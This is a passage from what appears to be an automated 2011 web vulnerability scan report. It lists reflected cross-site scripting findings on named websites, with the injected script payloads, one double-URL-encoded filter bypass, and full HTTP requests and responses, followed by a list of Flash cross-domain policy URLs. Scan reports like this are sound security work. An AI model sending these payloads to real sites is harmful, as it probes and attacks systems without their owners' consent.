The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6cbe0'%3balert(1)//498261d4339 was submitted in the cli cookie. This input was echoed as 6cbe0';alert(1)//498261d4339 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 03 May 2011 15:43:29 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:29 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:29 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 15:43:29 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 03-May-2011 23:43:29 GMT
Content-Length: 8193

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-37937282_1304437409","http://ib.adnxs.com/ptj?member=311&inv_code=cm.rev_lee&size=300x250&imp_id=cm-37937282_1304437409,11fda490648f83c6cbe0';alert(1)//498261d4339&referrer=http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2F%3Fc3a2e%2522-alert%28%2522DORK%2522%29-%2522f8cf8d87874%3D1&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_lee%2F%3Bnet%3Dcm%3Bu%3D%2C
...[SNIP]...

6.127. http://www.adaeveningnews.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adaeveningnews.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b847"><script>alert(1)</script>b3c95de9fa8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico8b847"><script>alert(1)</script>b3c95de9fa8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.adaeveningnews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 03 May 2011 11:04:25 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
X-Content-Type-Warning: guessed from content
Content-Length: 361
Location: http://adaeveningnews.com/favicon.ico8b847"><script>alert(1)</script>b3c95de9fa8
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 12:04:25 GMT
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent2.peak.zope.net
X-Cache: MISS from cache1.peak.zope.net
Via: 1.0 parent2.peak.zope.net:8500 (squid/2.7.STABLE9), 1.0 cache1.peak.zope.net:8500 (squid)
Connection: close

<html>
<head>
<title>Resource Moved</title>
</head>
<body>
<p>This resource has been moved. Click the following link if you are not
automatically redirected: <a href="http://adaeveningnews.com/favicon.ico8b847"><script>alert(1)</script>b3c95de9fa8">
...[SNIP]...

6.128. http://www.adaeveningnews.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adaeveningnews.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 36b93<script>alert(1)</script>f929a837cc8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico36b93<script>alert(1)</script>f929a837cc8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.adaeveningnews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 03 May 2011 11:04:25 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
X-Content-Type-Warning: guessed from content
Content-Length: 357
Location: http://adaeveningnews.com/favicon.ico36b93<script>alert(1)</script>f929a837cc8
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 12:04:25 GMT
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent2.peak.zope.net
X-Cache: MISS from cache4.peak.zope.net
Via: 1.0 parent2.peak.zope.net:8500 (squid/2.7.STABLE9), 1.0 cache4.peak.zope.net:8500 (squid)
Connection: close

<html>
<head>
<title>Resource Moved</title>
</head>
<body>
<p>This resource has been moved. Click the following link if you are not
automatically redirected: <a href="http://adaeveningnews.com/
...[SNIP]...
</script>f929a837cc8">http://adaeveningnews.com/favicon.ico36b93<script>alert(1)</script>f929a837cc8</a>
...[SNIP]...

6.129. http://www.adaeveningnews.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adaeveningnews.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99560"><script>alert(1)</script>0b27b877563 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?99560"><script>alert(1)</script>0b27b877563=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.adaeveningnews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 03 May 2011 11:04:24 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
X-Content-Type-Warning: guessed from content
Content-Length: 367
Location: http://adaeveningnews.com/favicon.ico?99560"><script>alert(1)</script>0b27b877563=1
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 12:04:24 GMT
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent2.peak.zope.net
X-Cache: MISS from cache3.peak.zope.net
Via: 1.0 parent2.peak.zope.net:8500 (squid/2.7.STABLE9), 1.0 cache3.peak.zope.net:8500 (squid)
Connection: close

<html>
<head>
<title>Resource Moved</title>
</head>
<body>
<p>This resource has been moved. Click the following link if you are not
automatically redirected: <a href="http://adaeveningnews.com/favicon.ico?99560"><script>alert(1)</script>0b27b877563=1">
...[SNIP]...

6.130. http://www.adaeveningnews.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adaeveningnews.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5a78f<script>alert(1)</script>61417a57cf2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?5a78f<script>alert(1)</script>61417a57cf2=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.adaeveningnews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 03 May 2011 11:04:24 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
X-Content-Type-Warning: guessed from content
Content-Length: 363
Location: http://adaeveningnews.com/favicon.ico?5a78f<script>alert(1)</script>61417a57cf2=1
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 12:04:24 GMT
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent2.peak.zope.net
X-Cache: MISS from cache2.peak.zope.net
Via: 1.0 parent2.peak.zope.net:8500 (squid/2.7.STABLE9), 1.0 cache2.peak.zope.net:8500 (squid)
Connection: close

<html>
<head>
<title>Resource Moved</title>
</head>
<body>
<p>This resource has been moved. Click the following link if you are not
automatically redirected: <a href="http://adaeveningnews.com/
...[SNIP]...
</script>61417a57cf2=1">http://adaeveningnews.com/favicon.ico?5a78f<script>alert(1)</script>61417a57cf2=1</a>
...[SNIP]...

6.131. http://www.imaxenes.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imaxenes.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 46a02<script>alert(1)</script>d57d740c7bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico46a02<script>alert(1)</script>d57d740c7bb HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.imaxenes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 May 2011 10:47:37 GMT
Server: tigershark/3.0.128 (dn-fh23.directnic.com)
Location: http://recorta.com/abriendo.html/favicon.ico46a02<script>alert(1)</script>d57d740c7bb
Content-Type: text/html
Content-Length: 1287

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
   <META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
   <STYLE type="text/css">
   <!--
       BODY { margin:
...[SNIP]...
<P class=extra>The file specified (/favicon.ico46a02<script>alert(1)</script>d57d740c7bb) has been moved to <A href="http://recorta.com/abriendo.html/favicon.ico46a02<script>
...[SNIP]...

6.132. http://www.imaxenes.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imaxenes.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36ac2"><script>alert(1)</script>67dcf517012 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico36ac2"><script>alert(1)</script>67dcf517012 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.imaxenes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 May 2011 10:47:33 GMT
Server: tigershark/3.0.128 (dn-fh23.directnic.com)
Location: http://recorta.com/abriendo.html/favicon.ico36ac2"><script>alert(1)</script>67dcf517012
Content-Type: text/html
Content-Length: 1293

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
   <META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
   <STYLE type="text/css">
   <!--
       BODY { margin:
...[SNIP]...
<A href="http://recorta.com/abriendo.html/favicon.ico36ac2"><script>alert(1)</script>67dcf517012">
...[SNIP]...

6.133. http://www.nextbigfuture.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nextbigfuture.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d64ef%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3131ff19525 was submitted in the REST URL parameter 1. This input was echoed as d64ef"><script>alert(1)</script>3131ff19525 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /favicon.icod64ef%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3131ff19525 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nextbigfuture.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Tue, 03 May 2011 10:20:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash05
X-AspNet-Version: 2.0.50727
Content-Length: 200
Location: http://nextbigfuture.com/favicon.icod64ef"><script>alert(1)</script>3131ff19525
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://nextbigfuture.com/favicon.icod64ef"><script>alert(1)</script>3131ff19525">here</a>.</body>

6.134. http://www.nextbigfuture.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nextbigfuture.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a4bb"><script>alert(1)</script>a355b28398e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?7a4bb"><script>alert(1)</script>a355b28398e=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nextbigfuture.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Tue, 03 May 2011 10:20:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash08
X-AspNet-Version: 2.0.50727
Content-Length: 203
Location: http://nextbigfuture.com/favicon.ico?7a4bb"><script>alert(1)</script>a355b28398e=1
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://nextbigfuture.com/favicon.ico?7a4bb"><script>alert(1)</script>a355b28398e=1">here</a>.</body
...[SNIP]...

6.135. http://www.russianeuro.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.russianeuro.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fddd"><script>alert(1)</script>456541e7a00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?8fddd"><script>alert(1)</script>456541e7a00=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.russianeuro.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 May 2011 10:57:35 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 269
Location: http://www.russiancupid.com/favicon.ico?8fddd"><script>alert(1)</script>456541e7a00=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.russiancupid.com/favicon.ico?8fddd"><script>alert(1)</script>456541e7a00=1">http://www.russiancupid.com/favico
...[SNIP]...

6.136. http://www.russianeuro.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.russianeuro.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5b9bd<script>alert(1)</script>e449a91ea2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?5b9bd<script>alert(1)</script>e449a91ea2e=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.russianeuro.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 May 2011 10:57:35 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 265
Location: http://www.russiancupid.com/favicon.ico?5b9bd<script>alert(1)</script>e449a91ea2e=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.russiancupid.com/favicon.ico?5b9bd<script>alert(1)</script>e449a91ea2e=1">http://www.russiancupid.com/favicon.ico?5b9bd<script>alert(1)</script>e449a91ea2e=1</a>
...[SNIP]...

6.137. http://www.timeswv.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.timeswv.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6d545<script>alert(1)</script>288d9a81df7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico6d545<script>alert(1)</script>288d9a81df7 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.timeswv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 03 May 2011 10:35:03 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
X-Content-Type-Warning: guessed from content
Content-Length: 343
Location: http://timeswv.com/favicon.ico6d545<script>alert(1)</script>288d9a81df7
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 11:35:03 GMT
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent3.peak.zope.net
X-Cache: MISS from cache2.peak.zope.net
Via: 1.0 parent3.peak.zope.net:8500 (squid/2.7.STABLE9), 1.0 cache2.peak.zope.net:8500 (squid)
Connection: close

<html>
<head>
<title>Resource Moved</title>
</head>
<body>
<p>This resource has been moved. Click the following link if you are not
automatically redirected: <a href="http://timeswv.com/favicon
...[SNIP]...
</script>288d9a81df7">http://timeswv.com/favicon.ico6d545<script>alert(1)</script>288d9a81df7</a>
...[SNIP]...

6.138. http://www.timeswv.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.timeswv.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d50cf"><script>alert(1)</script>fb103432d52 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.icod50cf"><script>alert(1)</script>fb103432d52 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.timeswv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 03 May 2011 10:35:03 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
X-Content-Type-Warning: guessed from content
Content-Length: 347
Location: http://timeswv.com/favicon.icod50cf"><script>alert(1)</script>fb103432d52
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 11:35:03 GMT
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent2.peak.zope.net
X-Cache: MISS from cache2.peak.zope.net
Via: 1.0 parent2.peak.zope.net:8500 (squid/2.7.STABLE9), 1.0 cache2.peak.zope.net:8500 (squid)
Connection: close

<html>
<head>
<title>Resource Moved</title>
</head>
<body>
<p>This resource has been moved. Click the following link if you are not
automatically redirected: <a href="http://timeswv.com/favicon.icod50cf"><script>alert(1)</script>fb103432d52">
...[SNIP]...

6.139. http://www.timeswv.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.timeswv.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4f172<script>alert(1)</script>8cbe816c7f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?4f172<script>alert(1)</script>8cbe816c7f5=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.timeswv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 03 May 2011 10:35:00 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
X-Content-Type-Warning: guessed from content
Content-Length: 349
Location: http://timeswv.com/favicon.ico?4f172<script>alert(1)</script>8cbe816c7f5=1
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 11:35:00 GMT
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent3.peak.zope.net
X-Cache: MISS from cache1.peak.zope.net
Via: 1.0 parent3.peak.zope.net:8500 (squid/2.7.STABLE9), 1.0 cache1.peak.zope.net:8500 (squid)
Connection: close

<html>
<head>
<title>Resource Moved</title>
</head>
<body>
<p>This resource has been moved. Click the following link if you are not
automatically redirected: <a href="http://timeswv.com/favicon
...[SNIP]...
</script>8cbe816c7f5=1">http://timeswv.com/favicon.ico?4f172<script>alert(1)</script>8cbe816c7f5=1</a>
...[SNIP]...

6.140. http://www.timeswv.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.timeswv.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21778"><script>alert(1)</script>f0cd34065fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?21778"><script>alert(1)</script>f0cd34065fb=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.timeswv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 03 May 2011 10:34:59 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
X-Content-Type-Warning: guessed from content
Content-Length: 353
Location: http://timeswv.com/favicon.ico?21778"><script>alert(1)</script>f0cd34065fb=1
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 11:34:59 GMT
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent2.peak.zope.net
X-Cache: MISS from cache4.peak.zope.net
Via: 1.0 parent2.peak.zope.net:8500 (squid/2.7.STABLE9), 1.0 cache4.peak.zope.net:8500 (squid)
Connection: close

<html>
<head>
<title>Resource Moved</title>
</head>
<body>
<p>This resource has been moved. Click the following link if you are not
automatically redirected: <a href="http://timeswv.com/favicon.ico?21778"><script>alert(1)</script>f0cd34065fb=1">
...[SNIP]...

7. Flash cross-domain policy previous next
There are 285 instances of this issue:

http://a.collective-media.net/crossdomain.xml
http://a.tribalfusion.com/crossdomain.xml
http://ad.doubleclick.net/crossdomain.xml
http://ad.turn.com/crossdomain.xml
http://ads.pointroll.com/crossdomain.xml
http://ads.specificmedia.com/crossdomain.xml
http://adserv.impactengine.com/crossdomain.xml
http://afe.specificclick.net/crossdomain.xml
http://aperture.displaymarketplace.com/crossdomain.xml
http://ar.voicefive.com/crossdomain.xml
http://as.casalemedia.com/crossdomain.xml
http://b.scorecardresearch.com/crossdomain.xml
http://b.voicefive.com/crossdomain.xml
http://bh.contextweb.com/crossdomain.xml
http://c.betrad.com/crossdomain.xml
http://c.yardbarker.com/crossdomain.xml
http://cache.specificmedia.com/crossdomain.xml
http://cdn.turn.com/crossdomain.xml
http://cms.quantserve.com/crossdomain.xml
http://d.xp1.ru4.com/crossdomain.xml
http://d13.zedo.com/crossdomain.xml
http://d3.zedo.com/crossdomain.xml
http://d7.zedo.com/crossdomain.xml
http://i.w55c.net/crossdomain.xml
http://ib.adnxs.com/crossdomain.xml
http://idpix.media6degrees.com/crossdomain.xml
http://img0.yardbarker.com/crossdomain.xml
http://img1.yardbarker.com/crossdomain.xml
http://img2.yardbarker.com/crossdomain.xml
http://img3.yardbarker.com/crossdomain.xml
http://k.collective-media.net/crossdomain.xml
http://l.betrad.com/crossdomain.xml
http://leeenterprises.112.2o7.net/crossdomain.xml
http://m1.zedo.com/crossdomain.xml
http://pixel.quantserve.com/crossdomain.xml
http://r.turn.com/crossdomain.xml
http://r1-ads.ace.advertising.com/crossdomain.xml
http://rs.gwallet.com/crossdomain.xml
http://servedby.flashtalking.com/crossdomain.xml
http://spe.atdmt.com/crossdomain.xml
http://speed.pointroll.com/crossdomain.xml
http://stat.flashtalking.com/crossdomain.xml
http://tags.bluekai.com/crossdomain.xml
http://turn.nexac.com/crossdomain.xml
http://www.610wtvn.com/crossdomain.xml
http://www.971zht.com/crossdomain.xml
http://www.977music.com/crossdomain.xml
http://www.air1.com/crossdomain.xml
http://www.am570radio.com/crossdomain.xml
http://www.artvoice.com/crossdomain.xml
http://www.axill.com/crossdomain.xml
http://www.big1059.com/crossdomain.xml
http://www.bikersingle.com/crossdomain.xml
http://www.boydgaming.com/crossdomain.xml
http://www.branditz.com/crossdomain.xml
http://www.broadbandsports.com/crossdomain.xml
http://www.builderonline.com/crossdomain.xml
http://www.buildlastingsuccess.com/crossdomain.xml
